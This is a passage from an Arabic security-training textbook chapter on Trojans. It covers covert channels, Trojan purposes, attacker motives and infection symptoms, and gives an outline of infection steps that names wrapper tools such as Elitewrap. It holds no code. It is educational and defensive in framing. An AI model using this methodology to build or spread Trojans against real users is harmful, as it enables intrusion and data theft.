‫اﻟﻘﻧوات اﻟﻌﻼﻧﯾﺔ )‪ :(Overt channel‬ھو ﻣﺳﺎر ﻟﻼﺗﺻﺎﻻت اﻟﻣﺷروﻋﺔ ﺿﻣن ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو اﻟﺷﺑﻛﺔ‪ ،‬ﻟﻧﻘل اﻟﺑﯾﺎﻧﺎت‪ .‬اﻟﻘﻧﺎة اﻟﻌﻠﻧﯾﺔ ﯾﻣﻛن‬
‫اﺳﺗﻐﻼﻟﮭﺎ ﻟﺧﻠﻖ وﺟود ﻗﻧﺎة ﺳرﯾﺔ ﻣن ﺧﻼل ﺗﺣدﯾد ﻣﻛوﻧﺎت اﻟﻘﻧوات اﻟﻌﻠﻧﯾﺔ ﻣﻊ اﻟﻣراﻋﺎة ﺑﻛوﻧﮭﺎ ‪ idle‬وﻟﯾس ﻟﮭﺎ ﺻﻠﮫ ﺑﮭﺎ‪.‬‬
‫أﺑﺳط ﻣﺛﺎل ﻟﻠﻘﻧوات اﻟﻌﻼﻧﯾﺔ ھو اﻷﻟﻌﺎب ﻣﺛل ‪ pocker.exe‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﺷروﻋﺔ‪.‬‬
‫اﻟﻘﻧوات اﻟﺳرﯾﺔ )‪ :(Covert channel‬ھﻲ اﻟﻘﻧﺎة اﻟﺗﻲ ﺗﻧﻘل اﻟﻣﻌﻠوﻣﺎت داﺧل ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو اﻟﺷﺑﻛﺔ‪ ،‬ﺑطرﯾﻘﺔ ﺗﺧﺎﻟف ﺳﯾﺎﺳﺔ اﻷﻣن‪ .‬أﺑﺳط‬
‫ﺷﻛل ﻣن أﺷﻛﺎل اﻟﻘﻧﺎة اﻟﺳرﯾﺔ ھو ‪.Trojan.exe‬‬
‫اﻟﻐرض ﻣن اﺳﺗﺧدام ﺣﺻﺎن طروادة )‪(Purpose Of Trojans‬‬

‫أﺣﺻﻧﺔ طروادة ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ ﺧطﯾرة واﻟﺗﻲ ﺗؤﺛر ﻋﻠﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر دون ﻋﻠم اﻟﺿﺣﯾﺔ‪ .‬اﻟﻐرض ﻣن ﺣﺻﺎن طروادة‪/‬اﻟﺗروﺟﺎن ھو‪:‬‬
‫ﺣذف أو اﺳﺗﺑدال اﻟﻣﻠﻔﺎت اﻟﮭﺎﻣﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬ ‫‪-‬‬

‫ﺗوﻟﯾد ﺣرﻛﺔ اﻟﻣرور وھﻣﯾﺔ ﻟﺧﻠﻖ ھﺟﻣﺎت‪. DOS‬‬ ‫‪-‬‬
‫ﺗﺣﻣﯾل ﺑراﻣﺞ اﻟﺗﺟﺳس)‪ ،(adware) ،(spyware‬واﻟﻣﻠﻔﺎت اﻟﺧﺑﯾﺛﺔ)‪. (malicious file‬‬ ‫‪-‬‬
‫ﺗﺳﺟﯾل ﻟﻘطﺎت ﻣن ﺳطﺢ اﻟﻣﻛﺗب )‪ ،(screenshot‬واﻟﺻوت واﻟﻔﯾدﯾو ﻣن ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ﻛﻠﻣﺎت اﻟﺳر‪ ،‬واﻷﻛواد اﻷﻣﻧﯾﺔ‪ ،‬وﻣﻌﻠوﻣﺎت ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن ﺑﺎﺳﺗﺧدام ﻛﯾﻠوﺟرز‪.‬‬ ‫‪-‬‬
‫ﺗﻌطﯾل اﻟﺟدران اﻟﻧﺎرﯾﺔ وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪.‬‬ ‫‪-‬‬
‫إﻧﺷﺎء ‪ backdoor‬ﻟﻛﺳب اﻟوﺻول ﻋن ﺑﻌد‪.‬‬ ‫‪-‬‬
‫إﺻﺎﺑﺔ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻛﺄﻧﮫ ‪ Proxy Server‬ﻟﺗرﺣﯾل اﻟﮭﺟﻣﺎت‪.‬‬ ‫‪-‬‬
‫اﺳﺗﺧدام ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻛﺄﻧﮫ روﺑوت )‪(botnet‬ﻷداء ھﺟﻣﺎت‪. DDoS‬‬ ‫‪-‬‬
‫اﺳﺗﺧدام ﻛﻣﺑﯾوﺗر ﺿﺣﯾﺔ ﻹﻏراق)‪ (spamming‬و‪ blasting‬رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪.‬‬ ‫‪-‬‬
‫ﻣﺎ اﻟذي ﯾﻧﺗظره ﺻﺎﻧﻌوا ﺣﺻﺎن طروادة )‪(What Do Trojan Creators Look For‬؟‬
‫أﺣﺻﻧﺔ طروادة‪/‬ﺗروﺟﺎن ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻟﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣن اﻷﻧظﻣﺔ اﻷﺧرى وﻣﻣﺎرﺳﺔ اﻟﺳﯾطرة ﻋﻠﯾﮭﺎ‪ .‬أﺣﺻﻧﺔ طروادة ﯾﺳﺗﺧدم ﻟﻠﺑﺣث ﻋن‬
‫ﻣﻌﻠوﻣﺎت اﻟﺷﺧص اﻟﮭدف‪ ،‬ﻓﺈذا وﺟدت‪ ،‬ﯾﺗم إﻋﺎدة إرﺳﺎل ھذه اﻟﻣﻌﻠوﻣﺎت اﻟﻰ ﻛﺎﺗب اﻟﺗروﺟﺎن )اﻟﻣﮭﺎﺟم(‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﯾﻣﻛن أن ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن‬
‫ﺑﺎﻟﺳﯾطرة اﻟﺗﺎﻣﺔ ﻋﻠﻰ اﻟﻧظﺎم‪.‬‬
‫أﺣﺻﻧﺔ طروادة ﻻ ﺗﺳﺗﺧدم ﻓﻘط ﻟﻸﻏراض اﻟﻣدﻣرة؛ ﯾﻣﻛن أن ﺗﺳﺗﺧدم أﯾﺿﺎ ﻟﻠﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز ﺷﺧص ﻣﺎ واﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت‬
‫اﻟﺧﺎﺻﺔ أو اﻟﺣﺳﺎﺳﺔ‪.‬‬
‫ﯾﺗم إﻧﺷﺎء أﺣﺻﻧﺔ طروادة )‪ (Trojan‬وذﻟك ﻟﻸﺳﺑﺎب اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -1‬ﻟﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ‪ ،‬ﻣﺛل‪:‬‬
‫‪ -‬ﻣﻌﻠوﻣﺎت ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺳﺟﯾل اﻟﻧطﺎق)‪ ، (domain registration‬وﻛذﻟك ﻓﻲ اﻟﺗﺳوق‪.‬‬
‫‪ -‬ﺑﯾﺎﻧﺎت اﻟﺣﺳﺎب ﻣﺛل ﻛﻠﻣﺎت ﺳر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬ﻛﻠﻣﺎت ﺳر اﻻﺗﺻﺎل اﻟﮭﺎﺗﻔﻲ‪ ،‬وﻛﻠﻣﺎت اﻟﺳر ﺧدﻣﺎت اﻟوﯾب‪ .‬ﻋﻧﺎوﯾن اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟم ﻋﻠﻰ اﻧﺷﺎء اﻟﺑرﯾد اﻟﻣزﻋﺞ‪.‬‬

‫‪496‬‬
‫ﻣﺷﺎرﯾﻊ اﻟﺷرﻛﺔ اﻟﮭﺎﻣﺔ ﺑﻣﺎ ﻓﻲ ذﻟك ‪ presentations‬وأوراق اﻟﻌﻣل ذات اﻟﺻﻠﺔ ﯾﻣﻛن أن ﺗﻛون ھدﻓﺎ ﻟﮭؤﻻء اﻟﻣﮭﺎﺟﻣﯾن‪ ،‬اﻟذﯾن ﻗد‬ ‫‪-‬‬
‫ﯾﻌﻣﻠون ﻟﺣﺳﺎب ﺷرﻛﺎت ﻣﻧﺎﻓﺳﺔ‪.‬‬
‫ﯾُﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﻣن اﺳﺗﺧدام أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻟﺗﺧزﯾن اﻟﻣﺣﻔوظﺎت ﻣن ﻣواد ﻏﯾر ﻣﺷروﻋﺔ‪ ،‬ﻣﺛل إﻧﺗﺎج اﻟﻣواد اﻹﺑﺎﺣﯾﺔ‪.‬‬ ‫‪-‬‬
‫اﻟﮭدف ﯾﻣﻛﻧﮫ اﻻﺳﺗﻣرار ﻓﻲ اﺳﺗﺧدام أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮫ‪ ،‬وﻟﯾس ﻟدﯾﮭم ﻓﻛرة ﻋن اﻷﻧﺷطﺔ اﻟﻐﯾر ﻣﺷروﻋﺔ اﻟﺗﻲ ﯾﺗم‬
‫اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬
‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ‪ FTP‬ﻟﻠﺑراﻣﺞ اﻟﻣﻘرﺻﻧﺔ‪.‬‬ ‫‪-‬‬
‫‪ Script kiddie’s‬ﻗد ﯾرﯾدون ﻓﻘط اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﺗﻌﺔ ﻣﻊ اﻟﻧظﺎم اﻟﮭدف‪ .‬ﻷﻧﮫ ﻗد ﯾزرع ﺣﺻﺎن طروادة ﻓﻲ اﻟﻧظﺎم‪ ،‬واﻟذي ﯾﺑدأ أن‬ ‫‪-‬‬
‫ﯾﺗﺻرف ﺑﻐراﺑﺔ‪ :‬ﺣﯾث ﯾﻔﺗﺢ ﻋﻠﺑﺔ اﻟﻘرص اﻟﻣﺿﻐوط وﯾﻐﻠﻘﮫ ﺑﺷﻛل ﻣﺗﻛرر‪ ،‬وظﺎﺋف اﻟﻣﺎوس ﺑﺷﻛل ﻏﯾر ﺻﺣﯾﺢ‪ ،‬اﻟﺦ‪.‬‬
‫اﻟﻧظﺎم اﻟﻣﺧﺗرق ﯾﻣﻛن اﺳﺗﺧداﻣﮫ ﻷﻏراض أﺧرى ﻏﯾر ﻣﺷروﻋﺔ‪ ،‬وﺳوف ﯾﺗﺣﻣل اﻟﮭدف اﻟﻣﺳؤوﻟﺔ ﻋن ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻏﯾر اﻟﻘﺎﻧوﻧﯾﺔ‪،‬‬ ‫‪-‬‬
‫إذا اﻛﺗﺷﻔت اﻟﺳﻠطﺎت ھذا‪.‬‬
‫اﻟﻣؤﺷرات ﻋﻠﻰ وﺟود ھﺟوم طروادة ‪Indications Of A Trojan Attack‬‬

‫ﺣﺻﺎن طروادة‪/‬ﺗروﺟﺎن ھو ﺑرﻧﺎﻣﺞ ﻣﺻﻣم ﻟﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت وھدم اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬أﻧﮫ ﯾﻧﺷﺎ ‪ Backdoor‬ﻣن اﺟل ﺗﺳﮭﯾل اﻗﺗﺣﺎم اﻟﻣﮭﺎﺟﻣﯾن‬
‫اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺑطرﯾﻘﺔ ﻣﺧﻔﯾﺔ‪ .‬اﻟﻧظﺎم ﯾﺻﺑﺢ ﻋرﺿﺔ ﻟطروادة‪ ،‬وﯾُﻣﻛن ﺑﺳﮭوﻟﺔ اﻟﻣﮭﺎﺟﻣﯾن ﻣن إطﻼق ھﺟوﻣﮭم ﻋﻠﻰ اﻟﻧظﺎم إذا ﻟم ﯾﺗم اﻟﺣﻔﺎظ‬
‫ﻋﻠﯾﮫ‪ .‬ﯾﻣﻛن ﻷﺣﺻﻧﺔ طروادة دﺧول اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام وﺳﺎﺋل ﻣﺧﺗﻠﻔﺔ ﻣﺛل اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ واﻟﻣﻠﺣﻘﺎت واﻟﺗﻧزﯾﻼت‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪ ،‬واﻟﻣﻧﺎﻓذ‬
‫اﻟﻣﻔﺗوﺣﺔ‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻟﻣؤﺷرات اﻟﺗﻲ ﻗد ﺗﻼﺣظ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻧدﻣﺎ ﯾﺗﻌرض ﻟﮭﺟوم ﻣن ﻗﺑل طروادة‪:‬‬
‫‪ -‬درج ‪ CD-ROM‬ﯾﻔﺗﺢ وﯾﻐﻠﻖ ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮫ‪.‬‬
‫‪ -‬ﯾﺗم إﻋﺎدة ﺗوﺟﯾﮫ ﻣﺗﺻﻔﺢ اﻟﻛﻣﺑﯾوﺗر إﻟﻰ ﺻﻔﺣﺎت ﻣﺟﮭوﻟﺔ‪.‬‬
‫‪ -‬ظﮭور ﻣرﺑﻌﺎت دردﺷﺔ ﻏرﯾﺑﺔ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪.‬‬
‫‪ -‬طﺑﺎﻋﺔ وﺛﺎﺋﻖ أو رﺳﺎﺋل ﻣن اﻟطﺎﺑﻌﺔ‪.‬‬
‫‪ -‬ﯾﺗم ﻋﻛس وظﺎﺋف أزرار اﻟﻣﺎوس اﻟﯾﻣﯾن واﻟﯾﺳﺎر‪.‬‬
‫‪ -‬ﻧﺷﺎط ﻏﯾر طﺑﯾﻌﻲ ﻣن ﻗﺑل اﻟﻣودم‪ ،‬ﻣﺣول اﻟﺷﺑﻛﺔ‪ ،‬أو اﻟﻘرص اﻟﺻﻠب‪.‬‬
‫‪ -‬ﯾﺗم ﺗﻐﯾﯾر ﻛﻠﻣﺎت ﻣرور اﻟﺣﺳﺎب أو اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ‪.‬‬
‫‪ -‬ﺑﯾﺎﻧﺎت ﺷراء ﻏرﯾﺑﺔ ﺗظﮭر ﻓﻲ ﻓواﺗﯾر ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪.‬‬
‫‪ ISP -‬ﯾﺷﻛو إﻟﻰ اﻟﮭدف أن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮫ ﯾﻘوم ﺑﻔﺣص ‪.IP‬‬
‫‪ -‬اﻟﻧﺎس ﯾﻌرﻓون اﻟﻛﺛﯾر ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ﻋن اﻟﮭدف‪.‬‬
‫‪ -‬ﯾﺗم ﺗﻌطﯾل ﺑراﻣﺞ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت أو ﻻ ﺗﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬
‫‪ -‬اﺧﺗﻔﺎء ﺷرﯾط اﻟﻣﮭﺎم‪.‬‬
‫‪497‬‬
‫ﺗﻐﯾﯾر إﻋدادات اﻷﻟوان اﻟﺧﺎص ﺑﺎﻟوﯾﻧدوز‪.‬‬ ‫‪-‬‬

‫ﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر ﺗﻘﻠب رأﺳﺎ ﻋﻠﻰ ﻋﻘب أو ﺑﺎﻟﻣﻘﻠوب‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر إﻋدادات ﺷﺎﺷﺔ اﻟﺗوﻗف ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر ﺧﻠﻔﯾﺔ اﻟﺷﺎﺷﺔ أو إﻋدادات اﻟﺧﻠﻔﯾﺔ‪.‬‬ ‫‪-‬‬
‫اﺧﺗﻔﺎء زر ﺑدء ﺗﺷﻐﯾل ‪.Windows‬‬ ‫‪-‬‬
‫اﺧﺗﻔﺎء ﻣؤﺷر اﻟﻣﺎوس أو ﯾﺗﺣرك ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮫ‪.‬‬ ‫‪-‬‬
‫إﯾﻘﺎف ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮫ‪.‬‬ ‫‪-‬‬
‫‪ Ctrl+Alt+Del‬ﯾﺗوﻗف ﻋن اﻟﻌﻣل‪.‬‬ ‫‪-‬‬
‫اﻟﺗﻌطل اﻟﻣﺗﻛرر أو اﻟﺑراﻣﺞ ﯾﺗم ﻓﺗﺣﮭﺎ‪/‬ﻏﻠﻘﺎھﺎ ﺑﺷﻛل ﻏﯾر ﻣﺗوﻗﻊ‪.‬‬ ‫‪-‬‬
‫ﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر ﯾﺗﺣول ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮫ اﻟﻰ اﻟوﺿﻊ ‪ on‬او ‪.off‬‬ ‫‪-‬‬
‫أﻛﺛر اﻟﻣﻧﺎﻓذ ﺷﮭره اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ﺣﺻﺎن طروادة )‪(Common Ports Used By Trojans‬‬
‫ﻣﻧﺎﻓذ ‪ IP‬ﺗﻠﻌب دورا ھﺎﻣﺎ ﻓﻲ رﺑط ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت وﺗﺻﻔﺢ اﻻﻧﺗرﻧت‪ ،‬وﺗﺣﻣﯾل اﻟﻣﻌﻠوﻣﺎت واﻟﻣﻠﻔﺎت‪ ،‬وﺗﺷﻐﯾل‬
‫ﺗﺣدﯾﺛﺎت اﻟﺑراﻣﺞ‪ ،‬وإرﺳﺎل واﺳﺗﻘﺑﺎل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ واﻟرﺳﺎﺋل ﺑﺣﯾث ﯾﻣﻛﻧك اﻻﺗﺻﺎل ﺑﺎﻟﻌﺎﻟم‪ .‬ﻛل ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﯾﺣﺗوي ﻋﻠﻰ ﻣﻧﺎﻓذ‬
‫ﻓرﯾدة ﻟﻸرﺳﺎل واﻻﺳﺗﻘﺑﺎل وﻣﺧﺻﺻﮫ ﻟﻛل وظﯾﻔﺔ‪.‬‬
‫ﯾﺣﺗﺎج اﻟﻣﺳﺗﺧدﻣون أن ﯾﻛون ﻟدﯾﮭم ﻓﮭم أﺳﺎﺳﻲ ﻟﺑﻌض اﻟﻣﺻطﻠﺣﺎت ﻣﺛل "اﻻﺗﺻﺎل اﻟﻧﺷط" واﻟﻣﻧﺎﻓذ اﻟﻣﺳﺗﺧدﻣﺔ ﻋﺎدة ﻣن ﻗﺑل ﺣﺻﺎن طروادة‬
‫ﻟﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ﻗد ﺗم اﺧﺗراق اﻟﻧظﺎم ام ﻻ‪.‬‬
‫ﻋﻧد ﻓﺣص اﻻﺗﺻﺎﻻت اﻟﻧﺷطﺔ واﻟﻣﻧﺎﻓذ ﻧﺟد أن ھﻧﺎك ﺣﺎﻻت ﻣﺧﺗﻠﻔﺔ‪ ،‬وﻟﻛن ﺣﺎﻟﺔ "‪ "listening‬ھﻲ واﺣدة ﻣﮭﻣﺔ ﻓﻲ ھذا اﻟﺳﯾﺎق‪ .‬ﺣﯾث ﯾﺗم‬
‫إﻧﺷﺎء ھذه اﻟﺣﺎﻟﺔ ﻋﻧدﻣﺎ ﯾﺳﺗﻣﻊ اﻟﻧظﺎم اﻟﻰ رﻗم اﻟﻣﻧﻔذ اﻟذي ﯾﻧﺗظر ﻹﺟراء اﺗﺻﺎل ﻣﻊ ﻧظﺎم آﺧر‪ .‬أﺣﺻﻧﺔ طروادة ﺑﺗﻛون ﻓﻲ ﺣﺎﻟﺔ اﻻﺳﺗﻣﺎع‬
‫)‪ (listen state‬ﻋﻧدﻣﺎ ﯾﺗم إﻋﺎدة ﺗﺷﻐﯾل اﻟﻧظﺎم‪ .‬ﺑﻌض أﺣﺻﻧﺔ طروادة ﺗﺳﺗﺧدم أﻛﺛر ﻣن ﻣﻧﻔذ واﺣد ﺣﯾث ﯾﺳﺗﺧدم ﻣﻧﻔذ واﺣد ﻟﻼﺳﺗﻣﺎع‬
‫)‪ (listening‬واﻟﻣﻧﺎﻓذ اﻷﺧرى ﻟﻧﻘل اﻟﺑﯾﺎﻧﺎت‪.‬‬

‫‪498‬‬
‫)‪TROJAN INFECTION (6.3‬‬
‫ﺣﺗﻰ اﻵن ﻧﺎﻗﺷﻧﺎ ﻣﺧﺗﻠف ﻣﻔﺎھﯾم اﻟﺗروﺟﺎن‪ .‬اﻵن ﺳوف ﻧﻧﺎﻗش ‪ .Trojan Infection‬ﻓﻲ ھذا اﻟﻘﺳم‪ ،‬ﺳوف ﻧﻧﺎﻗش أﺳﺎﻟﯾب ﻣﺧﺗﻠﻔﺔ اﻋﺗﻣدت ﻣن‬
‫ﻗﺑل اﻟﻣﮭﺎﺟم ﻟﺗﺛﺑﯾت ﺣﺻﺎن طروادة ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ واﺻﺎﺑﺔ ﻧظﺎﻣﮭم ﻣﻊ ھذه اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫ﻛﯾﻔﯾﺔ ﯾﺗم إﺻﺎﺑﺔ اﻷﻧظﻣﺔ ﻋن طرﯾﻖ ﺣﺻﺎن طروادة )‪(How To Infect Systems Using A Trojan‬؟‬
‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺳﯾطرة ﻋﻠﻰ اﻷﺟﮭزة واﻟﺑرﻣﺟﯾﺎت ﻋﻠﻰ اﻟﻧظﺎم ﻋن ﺑﻌد ﻋن طرﯾﻖ ﺗﺛﺑﯾت ﺣﺻﺎن طروادة‪ .‬ﻋﻧدﻣﺎ ﯾﺗم ﺗﺛﺑﯾت ﺣﺻﺎن طروادة‬
‫ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﻓﺎﻧﮫ ﻻ ﯾﻔﻌل ﻓﻘط ان ﺗﺻﺑﺢ اﻟﺑﯾﺎﻧﺎت ﻋرﺿﺔ ﻟﻠﺗﮭدﯾدات‪ ،‬وﻟﻛن أﯾﺿﺎ ھﻧﺎك اﺣﺗﻣﺎﻻت ﺑﺄن ﯾﻣﻛن اﻟﻣﮭﺎﺟم أن ﯾؤدي اﻟﮭﺟﻣﺎت ﻋﻠﻰ‬
‫ﻧظﺎم ‪ .third-party‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﺻﯾﺑون اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام ﺣﺻﺎن طروادة ﻓﻲ ﺑطرق ﻛﺛﯾرة‪:‬‬
‫ﯾﺗم ﺗﺿﻣﯾن أﺣﺻﻧﺔ طروادة ﻓﻲ ﺑرﻣﺟﯾﺎت ﺗﺟرﯾﺑﮫ أو ﺑراﻣﺞ ﻟﻠﺗﺣﻣﯾل‪ .‬ﻋﻧد ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل ھذه اﻟﻣﻠﻔﺎت‪ ،‬ﯾﺗم ﺗﺛﺑﯾت ﺣﺻﺎن‬ ‫‪-‬‬
‫طروادة ﻋﻠﻰ اﻷﻧظﻣﺔ ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫ﯾﺗم ﺧداع اﻟﻣﺳﺗﺧدﻣﯾن ﻣﻊ اﻹﻋﻼﻧﺎت اﻟﻣﻧﺑﺛﻘﺔ اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﺣﯾث ﯾﺗم ﺑرﻣﺟﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم ﺑطرﯾﻘﺔ ﻣﺎ ﻻ ﺗﮭﺗم ﻓﯾﮭﺎ ﻣﺎ إذا اﻟﻣﺳﺗﺧدم ﻗﺎم‬ ‫‪-‬‬
‫ﺑﺎﻟﻧﻘر ﻓوق ﻧﻌم أو ﻻ؛ ﺣﯾث ﺑﻣﺟرد ﺗﺣﻣﯾﻠﮫ ﯾﺑدأ ﻋﻣﻠﯾﺔ ﺗﺛﺑﯾت طروادة ﻋﻠﻰ اﻟﻧظﺎم ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺈرﺳﺎل ﺣﺻﺎن طروادة ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم ﻓﺗﺢ ھذه اﻟﻣرﻓﻘﺎت‪ ،‬ﯾﺗم ﺗﺛﺑﯾت طروادة ﻋﻠﻰ‬ ‫‪-‬‬
‫اﻟﻧظﺎم‪.‬‬
‫ﯾﻣﯾل اﻟﻣﺳﺗﺧدﻣون أﺣﯾﺎﻧﺎ إﻟﻰ اﻟﻧﻘر ﻋﻠﻰ أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻣﻠﻔﺎت ﻣﺛل ﺑطﺎﻗﺎت اﻟﻣﻌﺎﯾدة‪ ،‬وأﺷرطﺔ اﻟﻔﯾدﯾو اﻻﺑﺎﺣﯾﺔ واﻟﺻور وﻏﯾرھﺎ‪،‬‬ ‫‪-‬‬
‫ﺣﯾث ﯾﺗم ﺗﺛﺑﯾت ﺣﺻﺎن طروادة ﻋﻠﻰ اﻟﻧظﺎم ﺑﺻﻣت‪.‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻋﻣﻠﯾﺔ إﺻﺎﺑﺔ اﻷﺟﮭزة ﺑﺎﺳﺗﺧدام ﺣﺻﺎن طروادة ﺧطوة ﺑﺧطوة ﻛﺎﻻﺗﻰ‪:‬‬
‫اﻟﺧطوة ‪ :1‬إﻧﺷﺎء ﺣزﻣﺔ طروادة ﺟدﯾدة ﺑﺎﺳﺗﺧدام أدوات ﺑﻧﺎء ﺣﺻﺎن طروادة‪.‬‬
‫اﻟﺧطوة ‪ :2‬إﻧﺷﺎء ‪ ،dropper‬واﻟذي ھو ﺟزء ﻣن ﺣزﻣﺔ ﺗروﺟﺎن واﻟذي ﯾﻘوم ﺑﺗﺛﺑﯾت اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫اﻟﺧطوة ‪ :3‬إﻧﺷﺎء ‪ wrapper‬ﺑﺎﺳﺗﺧدام أدوات ﻟﺗﺛﺑﯾت طروادة ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ .‬ﺑﺎﺳﺗﺧدام أدوات ﻣﺧﺗﻠﻔﺔ ﻣﺛل‬
‫‪ ،Elitewrap ،Graffiti.exe ،petite.exe‬وﻣﺎ إﻟﻰ ذﻟك‪ ،‬ﯾﺗم إﻧﺷﺎء اﻟﻣﺟﻣﻊ )‪(wrapper‬ﻟﺗﺛﺑﯾت طروادة ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪.‬‬
‫اﻟﺧطوة ‪ :4‬ﻧﺷر ﺣﺻﺎن طروادة‪ .‬ﻧﺷر ﻓﯾروس اﻟﻛﻣﺑﯾوﺗر )‪ (spreading‬ﯾﻣﻛن أن ﯾﺗم ﻣن ﺧﻼل وﺳﺎﺋل ﻣﺧﺗﻠﻔﺔ‪:‬‬
‫‪ ‬آﻟﯾﺔ اﻟﺗﻧﻔﯾذ اﻟﺗﻠﻘﺎﺋﻲ )‪ (automatic execution mechanism‬ھو أﺳﻠوب واﺣد ﺣﯾث ﻋﺎدة ﻛﺎن ﯾﺗم ﻧﺷرھﺎ‬
‫ﻣن ﺧﻼل اﻷﻗراص اﻟﻣرﻧﺔ )‪ (floppy disc‬أﻣﺎ اﻵن ﻓﺗﻧﺷر ﻣن ﺧﻼل اﻷﺟﮭزة اﻟﺧﺎرﺟﯾﺔ اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﺑﻣﺟرد إﻋﺎدة‬
